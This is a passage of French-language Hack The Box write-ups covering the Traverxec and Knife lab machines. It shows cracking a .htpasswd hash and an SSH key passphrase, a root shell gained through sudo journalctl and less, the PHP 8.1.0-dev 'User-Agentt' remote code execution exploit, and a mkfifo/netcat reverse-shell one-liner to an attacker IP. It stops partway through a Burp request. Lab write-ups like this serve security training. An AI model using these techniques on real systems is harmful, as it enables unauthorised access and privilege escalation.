class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">www-data@traverxec:/usr/bin$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">www-data@traverxec:/usr/bin$ ^Z </span></span><span class="line"><span class="cl">zsh: suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@traverxec:/usr/bin$ </span></span></code></pre></td></tr></table> </div> </div><h3 id="david-user-infos---conf-nostromo">david user infos - conf nostromo </h3><p>En fouillant dans les dossier de l&rsquo;application web &ldquo;nostromo&rdquo;, on trouve un fichier de configuration. Il nous indique un fichier d&rsquo;authentification &ldquo;/var/nostromo/conf/.htpasswd&rdquo;. On y retrouve le mot de passe de l&rsquo;utilisateur david :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf </span></span><span class="line"><span class="cl"><span class="c1">## MAIN [MANDATORY]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">servername traverxec.htb </span></span><span class="line"><span class="cl">serverlisten * </span></span><span class="line"><span class="cl">serveradmin david@traverxec.htb </span></span><span class="line"><span class="cl">serverroot /var/nostromo </span></span><span class="line"><span class="cl">servermimes conf/mimes </span></span><span class="line"><span class="cl">docroot /var/nostromo/htdocs </span></span><span class="line"><span class="cl">docindex index.html </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## LOGS [OPTIONAL]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">logpid logs/nhttpd.pid </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## SETUID [RECOMMENDED]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">user www-data </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## BASIC AUTHENTICATION [OPTIONAL]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">htaccess .htaccess </span></span><span class="line"><span class="cl">htpasswd /var/nostromo/conf/.htpasswd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## ALIASES [OPTIONAL]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/icons /var/nostromo/icons </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## HOMEDIRS [OPTIONAL]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">homedirs /home </span></span><span class="line"><span class="cl">homedirs_public public_www </span></span><span class="line"><span class="cl">www-data@traverxec:/var/nostromo/conf$ cat /var/nostromo/conf/.htpasswd </span></span><span class="line"><span class="cl">david:<span class="nv">$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ</span>/ </span></span></code></pre></td></tr></table> </div> </div><p>On utilise hashcat pour casser le mot de passe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hashcat -m <span class="m">500</span> hash.txt ~/wordlists/rockyou.txt -O -w <span class="m">3</span> --show </span></span><span class="line"><span class="cl"><span class="nv">$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ</span>/:Nowonly4me </span></span></code></pre></td></tr></table> </div> </div><p>Credentials de david ? david : <code>Nowonly4me</code> ?</p> <p>Il semble qu&rsquo;un dossier de david est accessible, comme préciser dans la configuration de nostromo &ldquo;public_www&rdquo;. On y découvre une archive .tgz du nom de &ldquo;backup-ssh-identity-files.tgz&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@traverxec:/home/david$ <span class="nb">cd</span> public_www </span></span><span class="line"><span class="cl">www-data@traverxec:/home/david/public_www$ ls </span></span><span class="line"><span class="cl">index.html protected-file-area </span></span><span class="line"><span class="cl">www-data@traverxec:/home/david/public_www$ <span class="nb">cd</span> protected-file-area/ </span></span><span class="line"><span class="cl">www-data@traverxec:/home/david/public_www/protected-file-area$ ls </span></span><span class="line"><span class="cl">backup-ssh-identity-files.tgz </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="nb">cd</span> /tmp </span></span><span class="line"><span class="cl">tar -xvfz ... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">www-data@traverxec:/tmp/home/david/.ssh$ ls </span></span><span class="line"><span class="cl">authorized_keys id_rsa id_rsa.pub </span></span></code></pre></td></tr></table> </div> </div><p>On trouve une paire de clés SSH.</p> <h3 id="ssh2john---cracking-ssh-key-file">ssh2john - cracking ssh key file </h3><p>On trouve le mot de passe de la clé ssh. Password: <code>hunter</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Traverxec<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh2john ./id_rsa </span></span><span class="line"><span class="cl">./id_rsa:<span class="nv">$sshng$1$16$477</span>EEFFBA56F9D283D349033D5D08C4F<span class="nv">$1200$b1ec9e1ff7de1b5f5395468c76f1d92bfdaa7f2f29c3076bf6c83be71e213e9249f186ae856a2b08de0b3c957ec1f086b6e8813df672f993e494b90e9de220828aee2e45465b8938eb9d69c1e9199e3b13f0830cde39dd2cd491923c424d7dd62b35bd5453ee8d24199c733d261a3a27c3bc2d3ce5face868cfa45c63a3602bda73f08e87dd41e8cf05e3bb917c0315444952972c02da4701b5da248f4b1725fc22143c7eb4ce38bb81326b92130873f4a563c369222c12f2292fac513f7f57b1c75475b8ed8fc454582b1172aed0e3fcac5b5850b43eee4ee77dbedf1c880a27fe906197baf6bd005c43adbf8e3321c63538c1abc90a79095ced7021cbc92ffd1ac441d1dd13b65a98d8b5e4fb59ee60fcb26498729e013b6cff63b29fa179c75346a56a4e73fbcc8f06c8a4d5f8a3600349bb51640d4be260aaf490f580e3648c05940f23c493fd1ecb965974f464dea999865cfeb36408497697fa096da241de33ffd465b3a3fab925703a8e3cab77dc590cde5b5f613683375c08f779a8ec70ce76ba8ecda431d0b121135512b9ef486048052d2cfce9d7a479c94e332b92a82b3d609e2c07f4c443d3824b6a8b543620c26a856f4b914b38f2cfb3ef6780865f276847e09fe7db426e4c319ff1e810aec52356005aa7ba3e1100b8dd9fa8b6ee07ac464c719d2319e439905ccaeb201bae2c9ea01e08ebb9a0a9761e47b841c47d416a9db2686c903735ebf9e137f3780b51f2b5491e50aea398e6bba862b6a1ac8f21c527f852158b5b3b90a6651d21316975cd543709b3618de2301406f3812cf325d2986c60fdb727cadf3dd17245618150e010c1510791ea0bec870f245bf94e646b72dc9604f5acefb6b28b838ba7d7caf0015fe7b8138970259a01b4793f36a32f0d379bf6d74d3a455b4dd15cda45adcfdf1517dca837cdaef08024fca3a7a7b9731e7474eddbdd0fad51cc7926dfbaef4d8ad47b1687278e7c7474f7eab7d4c5a7def35bfa97a44cf2cf4206b129f8b28003626b2b93f6d01aea16e3df597bc5b5138b61ea46f5e1cd15e378b8cb2e4ffe7995b7e7e52e35fd4ac6c34b716089d599e2d1d1124edfb6f7fe169222bc9c6a4f0b6731523d436ec2a15c6f147c40916aa8bc6168ccedb9ae263aaac078614f3fc0d2818dd30a5a113341e2fcccc73d421cb711d5d916d83bfe930c77f3f99dba9ed5cfcee020454ffc1b3830e7a1321c369380db6a61a757aee609d62343c80ac402ef8abd56616256238522c57e8db245d3ae1819bd01724f35e6b1c340d7f14c066c0432534938f5e3c115e120421f4d11c61e802a0796e6aaa5a7f1631d9ce4ca58d67460f3e5c1cdb2c5f6970cc598805abb386d652a0287577c453a159bfb76c6ad4daf65c07d386a3ff9ab111b26ec2e02e5b92e184e44066f6c7b88c42ce77aaa918d2e2d3519b4905f6e2395a47cad5e2cc3b7817b557df3babc30f799c4cd2f5a50b9f48fd06aaf435762062c4f331f989228a6460814c1c1a777795104143630dc16b79f51ae2dd9e008b4a5f6f52bb4ef38c8f5690e1b426557f2e068a9b3ef5b4fe842391b0af7d1e17bfa43e71b6bf16718d67184747c8dc1fcd1568d4b8ebdb6d55e62788553f4c69d128360b407db1d278b5b417f4c0a38b11163409b18372abb34685a30264cdfcf57655b10a283ff0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Traverxec<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ vim a </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Traverxec<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ john a --wordlist<span class="o">=</span>/usr/share/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">Using default input encoding: UTF-8 </span></span><span class="line"><span class="cl">Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>SSH, SSH private key <span class="o">[</span>RSA/DSA/EC/OPENSSH 32/64<span class="o">])</span> </span></span><span class="line"><span class="cl">Cost <span class="m">1</span> <span class="o">(</span>KDF/cipher <span class="o">[</span><span class="nv">0</span><span class="o">=</span>MD5/AES <span class="nv">1</span><span class="o">=</span>MD5/3DES <span class="nv">2</span><span class="o">=</span>Bcrypt/AES<span class="o">])</span> is <span class="m">0</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Cost <span class="m">2</span> <span class="o">(</span>iteration count<span class="o">)</span> is <span class="m">1</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Will run <span class="m">2</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl">hunter <span class="o">(</span>?<span class="o">)</span> </span></span><span class="line"><span class="cl">1g 0:00:00:00 DONE <span class="o">(</span>2025-01-22 09:34<span class="o">)</span> 20.00g/s 2880p/s 2880c/s 2880C/s carolina..sandra </span></span><span class="line"><span class="cl">Use the <span class="s2">&#34;--show&#34;</span> option to display all of the cracked passwords reliably </span></span><span class="line"><span class="cl">Session completed. </span></span></code></pre></td></tr></table> </div> </div><h3 id="david-access---user-flag">David access - user flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Traverxec<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh david@traverxec.htb -i id_rsa </span></span><span class="line"><span class="cl">Enter passphrase <span class="k">for</span> key <span class="s1">&#39;id_rsa&#39;</span>: hunter </span></span><span class="line"><span class="cl">Linux traverxec 4.19.0-6-amd64 <span class="c1">#1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64</span> </span></span><span class="line"><span class="cl">david@traverxec:~$ whoami </span></span><span class="line"><span class="cl">david </span></span></code></pre></td></tr></table> </div> </div><h3 id="bonus-delete-password-on-ssh-key">Bonus: delete password on ssh key </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Traverxec<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh-keygen -p -f ./id_rsa </span></span><span class="line"><span class="cl">Enter old passphrase: hunter </span></span><span class="line"><span class="cl">Enter new passphrase <span class="o">(</span>empty <span class="k">for</span> no passphrase<span class="o">)</span>: <span class="o">(</span>empty<span class="o">)</span> </span></span><span class="line"><span class="cl">Enter same passphrase again: <span class="o">(</span>empty<span class="o">)</span> </span></span><span class="line"><span class="cl">Your identification has been saved with the new passphrase. </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="server-statssh">server-stats.sh </h3><p>Dans le script <strong>server-stats.sh</strong> on observe une commande qui peut etre executé en tant que root sans mot de passe pour david. Cela utilise le binaire journalctl pour afficher des logs.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">david@traverxec:~/bin$ cat server-stats.sh </span></span><span class="line"><span class="cl"><span class="c1">#!/bin/bash</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">cat /home/david/bin/server-stats.head </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;Load: `/usr/bin/uptime`&#34;</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34; &#34;</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`&#34;</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`&#34;</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34; &#34;</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;Last 5 journal log lines:&#34;</span> </span></span><span class="line"><span class="cl">/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service <span class="p">|</span> /usr/bin/cat </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit-journalctl-gtfobins">exploit journalctl (gtfobins) </h3><p>Sur gtfobins on trouve un moyen d&rsquo;exploiter ce binaire. En effet, journalctl utilise &ldquo;less&rdquo; pour afficher les données. Or less peut etre exploiter, en marquant &ldquo;!/bin/sh&rdquo; on peut ouvrir un shell a l&rsquo;interieur du programme, ce qui nous donne un accès root. CEPENDANT !! Quand je suis connecté en ssh a david, la commande journalctl n&rsquo;executait pas avec less. Ou alors le less se stoppait instantanément, donc imporssible de faire l&rsquo;exploit&hellip;</p> <p>Après vérification de la solution, en se connectant en ssh depuis le shell obtenu avec le user www-data, less est bien executé&hellip; Et on peut faire l&rsquo;exploit. Je pense qu&rsquo;il s&rsquo;agit d&rsquo;un probleme dans l&rsquo;environnement du shell utiliser qui doit etre différent. Au niveau des variables qui permette le pagineur utilisé par journalctl.</p> <p><a class="link" href="https://gtfobins.github.io/gtfobins/journalctl/" target="_blank" rel="noopener" >https://gtfobins.github.io/gtfobins/journalctl/</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service </span></span><span class="line"><span class="cl">-- Logs begin at Wed 2025-01-22 07:27:34 EST, end at Thu 2025-01-23 03:55:56 EST </span></span><span class="line"><span class="cl">Jan <span class="m">22</span> 08:09:14 traverxec su<span class="o">[</span>1018<span class="o">]</span>: pam_unix<span class="o">(</span>su-l:auth<span class="o">)</span>: authentication failure<span class="p">;</span> </span></span><span class="line"><span class="cl">Jan <span class="m">22</span> 08:09:16 traverxec su<span class="o">[</span>1018<span class="o">]</span>: FAILED SU <span class="o">(</span>to root<span class="o">)</span> www-data on pts/0 </span></span><span class="line"><span class="cl">Jan <span class="m">22</span> 08:15:57 traverxec su<span class="o">[</span>1055<span class="o">]</span>: pam_unix<span class="o">(</span>su:auth<span class="o">)</span>: authentication failure<span class="p">;</span> l </span></span><span class="line"><span class="cl">Jan <span class="m">22</span> 08:15:59 traverxec su<span class="o">[</span>1055<span class="o">]</span>: FAILED SU <span class="o">(</span>to david<span class="o">)</span> www-data on pts/0 </span></span><span class="line"><span class="cl">Jan <span class="m">22</span> 09:07:03 traverxec nhttpd<span class="o">[</span>1201<span class="o">]</span>: /../../../../bin/sh sent a bad cgi heade </span></span><span class="line"><span class="cl">!/bin/sh </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cat /root/root.txt </span> </span></span><span class="line"><span class="cl">ad59.....6f01 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/knife-htb/Wed, 22 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/knife-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Knife cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Knife</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.242</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv 10.10.10.242 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EA... </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2.... </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1l.... </span></span><span class="line"><span class="cl">80/tcp open http syn-ack Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Emergent Medical Idea </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl">Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="php-810-dev-rce">PHP 8.1.0-dev (RCE) </h3><p>Avec burp, on observe que le serveur utilise la version 8.1.0-dev de php. Avec <strong>searchsploit</strong>, on voit qu&rsquo;il existe une RCE sur cette version de php :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ searchsploit 8.1.0-dev </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PHP 8.1.0-dev - <span class="s1">&#39;User-Agentt&#39;</span> Remote Code Execution <span class="p">|</span> php/webapps/49933.py </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit-from-searchsploit">Exploit from searchsploit </h3><p>On peut utiliser un script python pour exploiter la vuln:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Knife<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 49933.py </span></span><span class="line"><span class="cl">Enter the full host url: </span></span><span class="line"><span class="cl">http://knife.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Interactive shell is opened on http://knife.htb </span></span><span class="line"><span class="cl">Can<span class="err">&#39;</span>t acces tty<span class="p">;</span> job crontol turned off. </span></span><span class="line"><span class="cl">$ whoami </span></span><span class="line"><span class="cl">james </span></span><span class="line"><span class="cl">$ rm /tmp/f<span class="p">;</span>mkfifo /tmp/f<span class="p">;</span>cat /tmp/f<span class="p">|</span>bash -i 2&gt;<span class="p">&amp;</span>1<span class="p">|</span>nc 10.10.16.6 <span class="m">1337</span> &gt;/tmp/f </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.16.6<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.242<span class="o">]</span> <span class="m">60424</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>1025<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">james@knife:/$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">james </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit-from-burp">Exploit from Burp </h3><p>La vulnérabilité consiste à ajouter une variable &ldquo;User-Agentt&rdquo;, avec 2 &ldquo;t&rdquo;, et d&rsquo;écrire la commande a executé dans la fonction &ldquo;zerodiumsystem(&lsquo;COMMANDE_ICI&rsquo;)&rdquo; :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## FROM BURP :</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GET / HTTP/1.1 </span></span><span class="line"><span class="cl">Host: knife.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux 